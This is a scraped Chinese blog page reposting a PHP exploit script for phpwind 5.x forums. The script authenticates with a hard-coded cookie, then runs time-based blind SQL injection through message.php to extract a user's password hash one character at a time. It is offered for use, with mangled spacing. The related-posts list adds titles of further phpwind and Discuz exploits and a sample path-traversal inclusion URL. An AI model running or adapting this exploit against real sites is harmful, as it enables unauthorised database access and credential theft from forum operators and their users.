phpwindexp.php,phpwind Exp 漏洞利用

最新推荐文章于 2021-04-02 00:11:57 发布
最新推荐文章于 2021-04-02 00:11:57 发布
阅读量145 收藏
点赞数
文章标签: phpwindexp.php

phpwind Exp 漏洞利用

2021-01-23 12:07:25644

忘记什么时候我就拿到了,一直没发挥.由于某些原因一直没发出来,毕竟不是原创,现在有人帖出来了,我也放出来.

程序代码

print_r("

+------------------------------------------------------------------+

ExploitForPhpwind5.XVersion

BYLoveshell

JustForFun:)

+------------------------------------------------------------------+

");

ini_set("max_execution_time",0);

error_reporting(7);

$bbspath="$argv[2]";

$server="$argv[1]";

$cookie='1ae40_lastfid=0;1ae40_ol_offset=776;1ae40_ck_info=%2F%09.72m.net;1ae40_winduser=A1QKBgE9UFxUUwAHDloFUAMIAFxeUgIMWgFUVVYDAA8HBFQNUVA%3D;1ae40_lastvisit=0%091173612527%09%2Fbbs%2Findex.php%3F;

$useragent="Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.1;SV1)";

$uid=intval($argv[3])>0?intval($argv[3]):1;

echo"\r\n#Logging\t........";

if(islogin())echo"LoginOk!\r\n";

elsedie("NotLogin!\tCheckYourCookieandUseragent!\r\n");

echo"#Testing\t........";

if(test())echo"Vul!\r\n";

elsedie("NotVul");

$hashtable='0123456789abcdef';

$count=0;

echo"#Cracking\t\r\n\r\n";

for($i=1;$i<=16;$i++){

echo"第\t$i\t位:";

$subpass=crack($i+8);

$password=$password.$subpass;

echo"$subpass\r\n";

}

echo"Password:\t$password";

echo"\r\nGoodLuck$countTimes\r\n";

functionsend($cmd,$path)

{

global$bbspath,$server,$cookie,$count,$useragent,$debug,$evilip;

$path=$bbspath."$path";

$message="POST".$path."HTTP/1.1\r\n";

$message.="Accept:*/*\r\n";

$message.="Accept-Language:zh-cn\r\n";

$message.="Referer:http://".$server.$path."\r\n";

$message.="Content-Type:application/x-www-form-urlencoded\r\n";

$message.="User-Agent:".$useragent."\r\n";

$message.="Host:".$server."\r\n";

$message.="Content-length:".strlen($cmd)."\r\n";

$message.="Connection:Keep-Alive\r\n";

$message.="Cookie:".$cookie."\r\n";

$message.="\r\n";

$message.=$cmd."\r\n";

$count=$count+1;

$fd=fsockopen($server,80);

fputs($fd,$message);

$resp="

";

while($fd&&!feof($fd)){

$resp.=fread($fd,1024);

}

fclose($fd);

$resp.="

";

if($debug){echo$cmd;echo$resp;}

//echo$resp;

return$resp;

}

functionsqlject($sql){

global$uid;

$data='action=pubmsg&readmsg=0)';

$data=$data."unionselectBENCHMARK(1000000,md5(12345))frompw_memberswhereuid=$uidand$sql".'/*';

$echo=send($data,'message.php');

preg_match("/Total(.*)\(/i",$echo,$matches);

if($matches[1]>2)return1;

elsereturn0;

}

functiontest(){

global$uid;

$data='action=pubmsg&readmsg=0)';

$echo=send($data,'message.php');

if(strpos($echo,'MySQLServerError'))return1;

elsereturn0;

}

functionislogin(){

global$uid;

$data='action=pubmsg&readmsg=0)';

$echo=send($data,'message.php');

if(strpos($echo,'login.php"'))return0;

elsereturn1;

}

functioncrack($i){

global$hashtable;

$sql="mid(password,$i,1)>0x".bin2hex('8');

if(sqlject($sql)){

$a=8;

$b=15;}

else{

$a=0;

$b=8;

}

for($tmp=$a;$tmp<=$b;$tmp++){

$sql="mid(password,$i,1)=0x".bin2hex($hashtable[$tmp]);

if(sqlject($sql))return$hashtable[$tmp];

}

crack($i);

}

?>

点击下载此文件

点击这里复制本文地址

以上内容由聚米学院网友整理呈现,如对侵犯您的权益,请联系邮箱:fzsbm@qq.com

weixin_39960019
关注
phpwindexp.php,phpwind 7.5 0day漏洞利用EXP发布)
weixin_39912163的博客
03-22 851
phpwind 7.5 Multiple Include Vulnerabilities一.api/class_base.php本地包含漏洞1.描叙api/class_base.php文件里callback函数里$mode变量没有过滤导致任意包含本地文件,从而可以执行任意PHP命令.2. 具体分析api/class_base.php文件里:function callback($mode, $met...
php8.7 入侵管理员密码,phpwind 8.3~8.7 重要安全漏洞补丁发布
weixin_39717367的博客
03-13 886
PHPWind v8.7刚刚发布不久,日前PHPWind官网就发现了PHPWind 8.3~8.7全系高等级安全漏洞,并发布相应的安全补丁,用户可自行修改文件,或者下载补丁文件覆盖网站。补丁名称:phpwind 8.3~8.7bata 安全补丁(更新时间20110826)影响版本:PW8.3 PW8.5 PW8.7bata涉及文件:/lib/utility/querybuilder.class.p...
phpwindexp.php,网络编程phpwind Exp 漏洞利用
weixin_28871645的博客
03-22 196
网络编程phpwind Exp 漏洞利用广告忘记什么时候我就拿到了,一直没发挥.由于某些原因一直没发出来,毕竟不是原创,现在有人帖出来了,我也放出来.程序代码print_r("+------------------------------------------------------------------+ExploitForPhpwind5.XVersionBYLoveshell...
phpwindexp.php,PHPWind v7.5 / v8.0漏洞EXP
weixin_30703633的博客
03-22 493
PHPWind v7.5 / v8.0漏洞EXP 主题关键词:phpwind7.5影响版本:PHPWind v7.5 / v8.0命令 :php pking.php user passhttp://www.xxxx.com/pking.php:复制内容到剪贴板程序代码
phpwindexp.php,phpwind 5.0.1 Sql注射漏洞利用程序
weixin_39889642的博客
03-22 71
print_r(”+——————————————————————+phpwind 5.0.1 Sql注射漏洞利用程序By loveshell[at]0×27.com欢迎访问 [[url]http://www.0[/url]×27.com]国内最专业最及时的web漏洞发放站点用法: c:\php5\php.exe phpwindexp.php [url]www.0[/url]×27.com /bbs...
PHPWind7.5多个文件包含漏洞exploit
lvming404的专栏
02-23 2025
尝试发送以下URL,能实现本地文件包含渗透。http://10.20.61.88/phpWind7.5/pw_api.php?type=uc&sig=8c6e45dcfae660037c05f0cd1a15695b&mode=../../../../../../../../test.txt%00http://10.20.61.88/phpWind7.5/pw_api.php?type=uc
phpwind Exp 漏洞利用
10-30
phpwind Exp 漏洞利用
Tencent.rar_PHPWIND7.3.2_TXPTOP_php 树形论坛_substancewod_树形论坛
09-24
功能完整pw树形论坛程序,phpwind7.3.2带采集,带自动顶贴功能。未加密版。 (Full-featured program pw tree forum, phpwind7.3.2 with acquisition, with automatic top posted functionality. Unencrypted version...
PHPWind_UTF8_7.3.2.zip_Windows编程_PHP_
08-12
PHPWind UTF8 7.3.2:一个强大的PHP论坛系统】 PHPWind UTF8 7.3.2是一款基于PHP语言开发的开源论坛软件,主要用于构建社区网站。这款工具以其高效、稳定和易用性著称,尤其适合那些希望使用PHP技术进行网站搭建...
phpwind7.5
09-17
PHPWind7.5:构建高效社区网站的利器》 PHPWind7.5,作为一款备受推崇的建站程序,以其强大的功能、易用性以及灵活性,在互联网行业中占据了重要的地位。这款开源软件专为构建社区论坛而设计,帮助无数企业和个人...
php留言本漏洞 后台,Phpwind7.5 后台本地包含漏洞
weixin_39836943的博客
03-25 252
文件:hack\rate\admin.php源码:<?php!function_exists('readover') && exit('Forbidden');define ( "H_R", R_P . "hack/rate/" );define ( "L_R", R_P . "lib/" );InitGP ( array ('ajax' ) );$action = strt...
php定时执行代码漏洞_PHPFPM 远程代码执行漏洞EXP
weixin_34755947的博客
01-10 101
在长亭科技举办的 Real World CTF 中,国外安全研究员 Andrew Danau 在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。在使用一些如下的Nginx配置的情况下,通过恶意构造的数据包,即可让PHP-FPM执行任意代码。 location ~ [^/]\.php(/|$) { fastcgi_sp...
php 7.07,Discuz!7.07.2 & Phpwind7.5 后台鸡肋漏洞漏洞预警 -电脑资料
weixin_28909779的博客
04-02 288
转自t00ls很多人有了,流传出来了,然后发出来,一、discuz后台settings.inc.php中写shell漏洞漏洞详情:if($operation == 'uc' && is_writeable('./config.inc.php') && $isfounder) {$ucdbpassnew = $settingsnew['uc']['dbpass'] ...
PHPWind v7.5 / v8.0漏洞EXP
收集盒 Book box
08-29 2967
PHPWind v7.5 / v8.0漏洞EXP 主题关键词:phpwind7.5 影响版本:PHPWind v7.5 / v8.0 命令 :php pking.php user passhttp://www.xxxx.com/ pking.php:复制内容到剪贴板程序代码
php7.2.0 漏洞,中国骇客云Discuz!7.0-7.2 & Phpwind7.5 后台漏洞
weixin_39555415的博客
03-27 624
对于dz,我们比较关心的是拿shell,但dz的东西想拿shell太难太难了,上一篇文章的末尾铺垫了下,所以这篇文章也算不上马后炮了…这个漏洞已经在discuz! x1版本悄悄给补上了,但是7.2及以下含有uc接口的版本的均没有补。这个漏洞其实也是老漏洞,去年大家就已经知道了,是二次写配置文件的漏洞,就是年初创始人通过后台ucenter拿shell漏洞的另外的利用办法。 很多人知道了,uc.php...
pendulum-2.1.2-cp39-cp39-win32.whl.rar
11-17
python whl离线安装包 pip安装失败可以尝试使用whl离线安装包安装 第一步 下载whl文件,注意需要与python版本配套 python版本号、32位64位、arm或amd64均有区别 第二步 使用pip install XXXXX.whl 命令安装,如果whl路径不在cmd窗口当前目录下,需要带上路径 WHL文件是以Wheel格式保存的Python安装包, Wheel是Python发行版的标准内置包格式。 在本质上是一个压缩包,WHL文件中包含了Python安装的py文件和元数据,以及经过编译的pyd文件, 这样就使得它可以在不具备编译环境的条件下,安装适合自己python版本的库文件。 如果要查看WHL文件的内容,可以把.whl后缀名改成.zip,使用解压软件(如WinRAR、WinZIP)解压打开即可查看。 为什么会用到whl文件来安装python库文件呢? 在python的使用过程中,我们免不了要经常通过pip来安装自己所需要的包, 大部分的包基本都能正常安装,但是总会遇到有那么一些包因为各种各样的问题导致安装不了的。 这时我们就可以通过尝试去Python安装包大全中(whl包下载下载whl包来安装解决问题。
Nginx配置文件中FastCGI相关参数理解
最新发布
11-17
Nginx配置文件中FastCGI相关参数理解
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值